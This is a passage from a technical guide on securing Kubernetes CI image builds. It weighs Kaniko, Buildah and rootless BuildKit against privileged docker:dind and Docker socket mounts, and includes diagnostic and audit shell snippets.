kubectl exec -it kaniko-build -n ci-builds -- ls -la /var/run/docker.sock
# ls: /var/run/docker.sock: No such file or directory

kubectl exec -it kaniko-build -n ci-builds -- ls -la /run/docker.sock
# ls: /run/docker.sock: No such file or directory

If either path exists, a Docker socket mount is present and the configuration is incorrect.

Trade-offs

Kaniko works for the majority of Dockerfiles but has documented feature gaps relative to the Docker daemon build engine. The --mount=type=cache Dockerfile instruction for build caches was not supported until relatively recent versions; --mount=type=tmpfs and --mount=type=bind have had varying support across releases. Kaniko’s snapshot mechanism (comparing file modification timestamps and hashes between layers) can produce incorrect results for builds that modify files without changing their timestamps — a rare but documented issue. Kaniko’s layer cache is stored in a registry rather than on the build node, which means cache hits require a registry round-trip; cold starts are slower than Docker’s local layer cache. Verify Dockerfile compatibility with Kaniko’s documented unsupported features list before migrating production builds.

Buildah with STORAGE_DRIVER=vfs is significantly slower than overlay-based builds because every layer transition requires a full directory copy rather than a copy-on-write operation. For a build with a 500 MB base image and five RUN layers, vfs storage may require 2-3 GB of disk I/O per build where overlay would require a fraction of that. This is acceptable for small images and low-concurrency builds but can cause disk pressure in high-throughput build clusters. If the runner environment supports fuse-overlayfs, use it. If not, monitor disk usage and build duration carefully.
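The estimate can be reproduced with a simple model. The following sketch assumes that vfs writes a full copy of the parent tree plus the new files for every layer, that overlay writes only the new files, and that each RUN step adds 10 MB; the per-step size and both function names are assumptions for illustration, and the initial unpacking of the base image is left out of both totals.

```python
def vfs_mb_written(base_mb: int, layer_deltas_mb: list) -> int:
    """MB written by vfs: each layer is a full copy of its parent plus its delta."""
    total = 0
    tree_size = base_mb
    for delta in layer_deltas_mb:
        tree_size += delta   # the new layer contains everything so far
        total += tree_size   # and all of it is written to disk again
    return total


def overlay_mb_written(layer_deltas_mb: list) -> int:
    """MB written by overlay: only the files each step actually changes."""
    return sum(layer_deltas_mb)


if __name__ == "__main__":
    deltas = [10] * 5  # five RUN steps, 10 MB each (assumed)
    print("vfs:", vfs_mb_written(500, deltas), "MB")
    print("overlay:", overlay_mb_written(deltas), "MB")
```

Under these assumptions the vfs build writes about 2.6 GB against 50 MB for overlay, and the gap grows with both the base image size and the number of layers.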

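Rootless BuildKit requires unprivileged user namespaces: CONFIG_USER_NS=y in the kernel, plus kernel.unprivileged_userns_clone=1 on kernels that carry that sysctl. The sysctl comes from a Debian-family kernel patch, so it does not exist on every distribution; RHEL and CentOS limit user namespaces through user.max_user_namespaces instead. Current Debian and Ubuntu kernels enable unprivileged user namespaces by default; some hardened distributions (RHEL/CentOS with certain security profiles, hardened Debian) disable them. Check before relying on rootless mode in self-hosted environments: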

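cat /proc/sys/kernel/unprivileged_userns_clone
# 1 = user namespaces available to unprivileged users
# 0 = user namespaces restricted; rootless BuildKit will not function
# "No such file or directory" = this kernel lacks the sysctl; check user.max_user_namespaces instead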
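A node preflight can cover both knobs in one pass. The following is a sketch, not a complete detection routine: userns_status is a hypothetical helper, the proc-root argument exists only for testing, and a result of "no restriction found" means neither sysctl blocks user namespaces, not that rootless BuildKit is guaranteed to work (CONFIG_USER_NS, AppArmor, or seccomp policy can still interfere).

```shell
# Hypothetical preflight: look for sysctls that disable unprivileged user namespaces.
# Returns 1 and names the offending knob if one is set to 0, otherwise returns 0.
userns_status() {
  proc_root="${1:-/proc}"
  clone_knob="${proc_root}/sys/kernel/unprivileged_userns_clone"
  max_knob="${proc_root}/sys/user/max_user_namespaces"

  # Debian-family kernels: 0 blocks unprivileged user namespace creation.
  if [ -r "$clone_knob" ] && [ "$(cat "$clone_knob")" = "0" ]; then
    echo "restricted: kernel.unprivileged_userns_clone=0"
    return 1
  fi
  # Mainline knob: a limit of 0 disables user namespaces entirely.
  if [ -r "$max_knob" ] && [ "$(cat "$max_knob")" = "0" ]; then
    echo "restricted: user.max_user_namespaces=0"
    return 1
  fi
  echo "no restriction found"
  return 0
}

userns_status || echo "rootless BuildKit is unlikely to work on this host"
```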

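The --oci-worker-no-process-sandbox flag lets rootless BuildKit run inside an unprivileged container by turning off the PID namespace sandbox around build steps, at reduced isolation: build processes can then see and signal other processes in the BuildKit container. It does not remove the user namespace requirement. This is a deployment-time decision, not a build-time one: the security properties of the build environment change based on whether the flag is set.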

All three tools add operational complexity compared to docker build. Build time differences are real. Cache behaviour differs from Docker’s local layer cache. Dockerfile compatibility requires testing. These are accepted costs for eliminating host root access from build infrastructure. The alternative cost — a single compromised build dependency reaching all secrets in your CI cluster — is not bounded.

Failure Modes

Using docker:dind without reading what it requires. The official docker:dind image is designed for running a Docker daemon inside a container. It works correctly only with --privileged. The image’s documentation and Docker Hub page state this. CI configurations that add this image without understanding its requirements end up with --privileged pods, sometimes in namespaces that were not intended to allow it. The failure mode is silent: the build works correctly, --privileged is present, and the security team discovers this six months later during an audit.
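Because this failure is silent at build time, it helps to make it loud at review time. The sketch below is a text-level audit of pipeline and pod manifests; audit_manifest is a hypothetical helper, and grep pattern matching is an approximation of YAML parsing, so treat it as a tripwire rather than a substitute for admission control.

```shell
# Hypothetical audit: flag privileged mode or a docker:dind image in a manifest file.
# Returns 1 if either pattern is found, 0 otherwise.
audit_manifest() {
  file="$1"
  status=0
  if grep -Eq 'privileged:[[:space:]]*true' "$file"; then
    echo "${file}: privileged: true"
    status=1
  fi
  if grep -Eq 'docker:[^[:space:]]*dind' "$file"; then
    echo "${file}: docker:dind image"
    status=1
  fi
  return "$status"
}

# Demo against a throwaway manifest (contents are illustrative only).
sample=$(mktemp)
cat > "$sample" <<'EOF'
containers:
  - name: build
    image: docker:dind
    securityContext:
      privileged: true
EOF
audit_manifest "$sample" || echo "audit failed: fix the findings above before merging"
rm -f "$sample"
```

Run as a required check on every change to CI configuration, this surfaces a new --privileged pod in the pull request rather than in an audit six months later.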

Assuming Kaniko is a drop-in Dockerfile replacement without testing. Kaniko implements a large subset of Dockerfile syntax but not all of it. Builds that use RUN --mount=type=cache for Go module or npm package caching, builds that use complex COPY --chmod flags, or builds that rely on specific Docker daemon behaviour for multi-stage builds may fail or produce incorrect results. Always run Kaniko against your actual Dockerfiles in a staging environment before removing --privileged from production build pipelines. Track Kaniko’s open issues — some Docker features are open enhancement requests, not temporary gaps.

Mounting the Docker socket “just for CI” without reviewing all build steps. The phrase “just for CI” implies reduced security impact. The opposite is true: CI pipelines pull dependencies, execute third-party code, and build from external base images. The attack surface is larger than production, not smaller. A team that mounts the Docker socket to allow docker build inside their CI containers has granted every script step in the job, every npm install script, and every build-time tool with shell access in the job container the ability to create privileged containers on the Kubernetes node. The socket mount is not scoped to image building operations: it is a credential to the host daemon, usable for any Docker operation.

Treating the build namespace as a less critical namespace and skipping admission control. Kubernetes namespaces scope RBAC and network policy, but they provide no isolation between pods that share a node. A privileged pod in ci-builds can reach the containers, volumes, and credentials of production pods scheduled on the same node. The ci-builds namespace is often treated as infrastructure rather than as a security domain, so admission controllers are deployed in enforcement mode for production and staging while ci-builds remains in audit mode or has exceptions. The correct configuration is enforcement mode in every namespace, including build namespaces: the blast radius of a build compromise is at minimum all other jobs on the same node and, with node-level access, extends to the IAM credentials available to that node.

Conflating “rootless container” with “safe for CI builds.” Running the CI job container itself as a non-root user does not prevent --privileged from being dangerous. A container running as UID 1000 with --privileged still has the full capability bounding set, no seccomp filter, and host devices exposed. Its effective capabilities start out empty, but any setuid binary or other path to UID 0 inside the container regains all of them. The security properties that matter are the presence or absence of --privileged and the presence or absence of the Docker socket mount, not the UID the container’s entry process runs as.
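One way to see this from inside a job is to read the capability masks in /proc/self/status rather than the UID. The sketch below checks a mask for CAP_SYS_ADMIN, which is capability number 21 in the kernel headers; has_cap_sys_admin is a hypothetical helper, and the example mask values in the usage note are ones commonly observed rather than guaranteed.

```shell
# Hypothetical helper: succeed if the given hex capability mask includes
# CAP_SYS_ADMIN (bit 21).
has_cap_sys_admin() {
  mask="$1"
  [ $(( (0x$mask >> 21) & 1 )) -eq 1 ]
}

# Inspect the current process, if the kernel exposes the masks.
if [ -r /proc/self/status ]; then
  bounding=$(awk '/^CapBnd:/ {print $2}' /proc/self/status)
  effective=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
  if [ -n "$bounding" ] && has_cap_sys_admin "$bounding"; then
    # A non-root UID typically shows an all-zero CapEff here, yet the
    # bounding set still allows a later UID 0 process to hold CAP_SYS_ADMIN.
    echo "CAP_SYS_ADMIN is in the bounding set (CapEff=${effective})"
  else
    echo "CAP_SYS_ADMIN is not in the bounding set"
  fi
fi
```

A default, unprivileged Docker container commonly reports a bounding set of 00000000a80425fb, which does not include bit 21; a privileged container reports a mask with every capability bit set, whatever UID the process runs as.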